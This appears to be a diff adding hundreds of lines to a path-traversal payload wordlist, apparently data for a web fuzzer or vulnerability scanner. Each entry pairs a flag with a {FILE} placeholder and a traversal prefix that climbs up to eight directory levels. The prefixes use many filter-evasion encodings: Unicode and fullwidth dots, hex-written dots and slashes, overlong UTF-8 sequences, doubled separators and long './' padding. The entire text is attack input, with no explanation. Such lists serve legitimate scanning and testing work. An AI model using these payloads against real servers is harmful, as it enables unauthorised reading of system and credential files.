+ "true,..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
+ "true,..%uF025{FILE}",
+ "true,..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
+ "true,%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
+ "true,%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
+ "true,..0x2f{FILE}",
+ "true,..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
+ "true,0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
+ "true,0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
+ "true,..0x5c{FILE}",
+ "true,..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
+ "true,0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
+ "true,0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
+ "true,..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}",
+ "true,..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}",
+ "true,///%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,\\\\\\%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..//{FILE}",
+ "true,..//..//{FILE}",
+ "true,..//..//..//{FILE}",
+ "true,..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//..//..//{FILE}",
+ "true,..///{FILE}",
+ "true,..///..///{FILE}",
+ "true,..///..///..///{FILE}",
+ "true,..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///..///..///{FILE}",
+ "true,..\\\\{FILE}",
+ "true,..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
+ "true,..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
+ "true,./\\/./{FILE}",
+ "true,./\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
+ "true,.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}",
+ "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,./../{FILE}",
+ "true,./.././../{FILE}",
+ "true,./.././.././../{FILE}",
+ "true,./.././.././.././../{FILE}",
+ "true,./.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././.././.././../{FILE}",
+ "true,.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
+ "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
